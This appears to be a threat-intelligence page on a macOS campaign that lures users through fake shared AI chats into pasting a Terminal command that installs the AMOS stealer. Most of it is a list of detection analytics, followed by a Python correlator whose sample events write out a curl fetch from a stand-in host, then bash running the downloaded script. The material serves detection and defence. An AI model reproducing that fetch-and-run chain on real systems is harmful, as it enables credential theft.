New AMOS Attack Path Demonstrates Security Gaps in AI Usage

Tags: AI-trust abuse, AMOS InfoStealer, fake Atlas browser, Atomic macOS Stealer

AtlasDrop is a macOS infostealer distribution campaign that exploits user trust in reputable AI platforms. Operators manipulate Google Search results with paid links or SEO-boosted sites that lead users to seemingly authentic shared AI conversations. These conversations present polished "fix" or "installer" procedures and urge victims to paste a Terminal command. That command retrieves a remote script, which obtains the user's password through social engineering, launches AMOS (Atomic macOS Stealer), and establishes persistence to maintain access and enable ongoing data exfiltration.

Indicators of Compromise


Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

Remediation References


User Execution: Malicious File (T1204.002)

ID: DET0294
Name: User Execution – Malicious File via download/open → spawn chain (T1204.002)

AN0819: User opens a file delivered by email, web, chat, or share. The handler application (Word, PDF reader, archiver) creates a file in a user-controlled path (Downloads, Temp, Desktop) and then spawns a new or unusual child process (e.g., powershell.exe, wscript.exe, cmd.exe, regsvr32.exe, rundll32.exe, msiexec.exe). Optional precursors include FileStreamCreated (URL/UNC) and Office → system32 batch writes.

AN0820: User opens a downloaded document or installer, producing an EndpointSecurity file-create event under ~/Downloads or ~/Library, followed by an exec of a suspicious utility (osascript, bash/zsh, curl, chmod, open -a Terminal). Correlates the file creation with the subsequent process exec and, optionally, with quarantine/LSQuarantine events.

AN0821: User or desktop application writes a new file to ~/Downloads, /tmp, or mounted removable media, followed by execve of a risky interpreter or loader (bash, sh, python, perl, php, node, curl|wget piping to sh, ld.so, rdesktop, xdg-open with unusual args). Uses auditd PATH+SYSCALL records (open/creat/write/rename) linked to the execve event.
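As an added example (not code from the original record or from the analytic's authors), the AN0820 chain above applied to the AtlasDrop flow described at the top of the page: a small correlator that pairs a file written under ~/Downloads or ~/Library with a risky utility executed shortly afterwards in the same session. The event schema, the "session" field (pid of the responsible app) and the five-minute window are assumptions; the sample events are constructed.

```python
from datetime import datetime, timedelta

# Utilities the analytic treats as suspicious right after a download.
RISKY_UTILS = {"osascript", "bash", "zsh", "sh", "curl", "chmod"}
WATCHED_DIRS = ("/Downloads/", "/Library/")
WINDOW = timedelta(minutes=5)  # assumed correlation window


def is_risky(ev):
    """Risky exec per AN0820; 'open' only counts when it targets Terminal."""
    if ev["process"] == "open":
        return "-a Terminal" in ev.get("args", "")
    return ev["process"] in RISKY_UTILS


def correlate(events):
    """Return (path, utility, seconds) for each watched-dir file create that is
    followed within WINDOW by a risky exec in the same session. Events are
    time-sorted dicts; 'session' is the pid of the responsible app (assumed)."""
    alerts, pending = [], []
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        if ev["type"] == "file_create" and any(d in ev["path"] for d in WATCHED_DIRS):
            pending.append((ts, ev["session"], ev["path"]))
        elif ev["type"] == "exec" and is_risky(ev):
            for cts, sess, path in pending:
                if ev["session"] == sess and timedelta(0) <= ts - cts <= WINDOW:
                    alerts.append((path, ev["process"], int((ts - cts).total_seconds())))
    return alerts


# Constructed sample telemetry, not real data. Session 501 is Terminal.app,
# where the victim pasted the command copied from the fake shared chat.
SAMPLE_EVENTS = [
    {"ts": "2025-01-01T10:00:00", "type": "exec", "session": 501, "process": "curl", "args": "-fsSL https://example.invalid/fix"},
    {"ts": "2025-01-01T10:00:02", "type": "file_create", "session": 501, "path": "/Users/alice/Downloads/fix.sh"},
    {"ts": "2025-01-01T10:00:05", "type": "exec", "session": 501, "process": "bash", "args": "/Users/alice/Downloads/fix.sh"},
    {"ts": "2025-01-01T10:00:09", "type": "exec", "session": 501, "process": "osascript", "args": "-e 'display dialog'"},
    # Benign: a note saved by TextEdit (session 600), then opened in Preview.
    {"ts": "2025-01-01T11:00:00", "type": "file_create", "session": 600, "path": "/Users/alice/Downloads/notes.txt"},
    {"ts": "2025-01-01T11:00:03", "type": "exec", "session": 600, "process": "open", "args": "-a Preview notes.txt"},
    # Outside the window: the same Terminal runs bash two hours later.
    {"ts": "2025-01-01T12:00:02", "type": "exec", "session": 501, "process": "bash", "args": "-c ls"},
]

if __name__ == "__main__":
    for path, util, secs in correlate(SAMPLE_EVENTS):
        print(f"ALERT: {util} ran {secs}s after {path} was written")
```

Only the Terminal session produces alerts: the curl exec precedes the file write, the Preview launch is not a risky utility, and the later bash run falls outside the window.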


User Execution: Malicious Image (T1204.003)

ID: DET0248
Name: User Execution – Malicious Image (containers & IaaS) – pull/run → start → anomalous behavior (T1204.003)

AN0691: CONTAINERS (Docker/K8s/containerd): A user pulls an untrusted image from a public or unknown registry and then creates and starts a container from that image. Shortly after start, the container spawns unexpected utilities (e.g., curl/wget/bash/python) or makes outbound network connections atypical for the namespace or workload. The analytic correlates Image Creation/Download → Container Creation → Container Start → Command Execution/Network activity within a short window and with a consistent image digest.

AN0692: IAAS (Cloud images/VMs): A new VM or instance is launched from a non-approved or newly seen image (AMI, GCP Image, Azure Image). On first boot, cloud-init/user-data or embedded agents download code, spawn system utilities, or open outbound C2 or mining traffic. The analytic correlates Instance/Image Creation → Instance Start → in-guest Process/Command Execution and/or anomalous network traffic.


Phishing (T1566)

ID: DET0070
Name: Detection Strategy for Phishing across platforms

AN0188: Unusual inbound email activity where attachments or embedded URLs are delivered to users, followed by execution of new processes or suspicious document behavior. Detection involves correlating email metadata, file creation, and network activity after a phishing message is received.

AN0189: Monitor for malicious payload delivery through phishing where attachments or URLs in email clients (e.g., Thunderbird, mutt) result in unusual file creation or outbound network connections. Focus on correlation between mail logs, file writes, and execution activity.

AN0190: Detection of phishing through anomalous Mail app activity, such as attachments saved to disk and immediately executed, or Safari/Preview launching URLs and files linked from email messages. Correlate UnifiedLogs events with subsequent process execution.

AN0191: Phishing via Office documents containing embedded macros or links that spawn processes. Detection relies on correlating Office application logs with suspicious child process execution and outbound network connections.

AN0192: Phishing attempts targeting IdPs often manifest as anomalous login attempts from suspicious email invitations or fake SSO prompts. Detection correlates login flows, MFA bypass attempts, and anomalous geographic patterns following phishing email delivery.

AN0193: Phishing delivered via SaaS services (chat, collaboration platforms) where messages contain malicious URLs or attachments. Detect anomalous link clicks, suspicious file uploads, or token misuse after SaaS-based phishing attempts.


Application Layer Protocol (T1071)

ID: DET0444
Name: Detection of Command and Control Over Application Layer Protocols

AN1225: Detects suspicious usage of common application-layer protocols (e.g., HTTP, HTTPS, DNS, SMB) by abnormal processes, with high outbound byte counts or irregular ports, possibly indicating command and control or data exfiltration.

AN1226: Detects suspicious curl, wget, or custom socket traffic that leverages DNS, HTTPS, or IRC-style protocols with unbalanced traffic or beacon-like intervals.

AN1227: Detects applications using abnormal protocols or high-volume traffic not previously associated with the process image, such as Automator or AppleScript invoking curl or python sockets.

AN1228: Detects application-layer tunneling or unauthorized application protocols such as DNS-over-HTTPS, embedded C2 in TLS/HTTP headers, or misused SMB traffic crossing VLANs.


Ingress Tool Transfer (T1105)

ID: DET0060
Name: Detect Ingress Tool Transfers via Behavioral Chain

AN0165: Unusual or uncommon processes initiate network connections to external destinations, followed by file creation (tools downloaded).

AN0166: Shell-based tools (curl, wget, scp) initiate connections to external domains, followed by creation of executable files on disk.

AN0167: Process execution of curl or wget followed by a network connection and a file created in temporary or user-specific directories.

AN0168: Command-line interface or vCLI triggers a remote transfer using wget or curl, writing files into datastore paths or local tmp directories.

AN0169: Network device logs show anomalous inbound file transfers or uncharacteristic flows with high payload volume to network devices with storage or automation hooks.


Command and Scripting Interpreter (T1059)

ID: DET0516
Name: Behavioral Detection of Command and Scripting Interpreter Abuse

AN1428: Detects the execution of scripting or command interpreters (e.g., powershell.exe, cmd.exe, wscript.exe) outside expected administrative time windows or from abnormal user contexts, often followed by encoded/obfuscated arguments or secondary execution events.

AN1429: Detects use of shell interpreters (e.g., bash, sh, python, perl) initiated by users or processes not normally executing them, especially when chaining suspicious utilities like netcat, curl, or ssh.

AN1430: Detects launch of command-line interpreters via Terminal, Automator, or hidden osascript, especially when parent process lineage deviates from user-initiated applications.

AN1431: Detects use of 'esxcli system' or direct interpreter commands (e.g., busybox shell) invoked unexpectedly from SSH or the host terminal.

AN1432: Identifies CLI interpreter access (e.g., Cisco IOS, Juniper JUNOS) via enable mode or scripting-capable sessions used by uncommon accounts or from unknown IPs.

Reports & References (1)

Observed Countries (250)
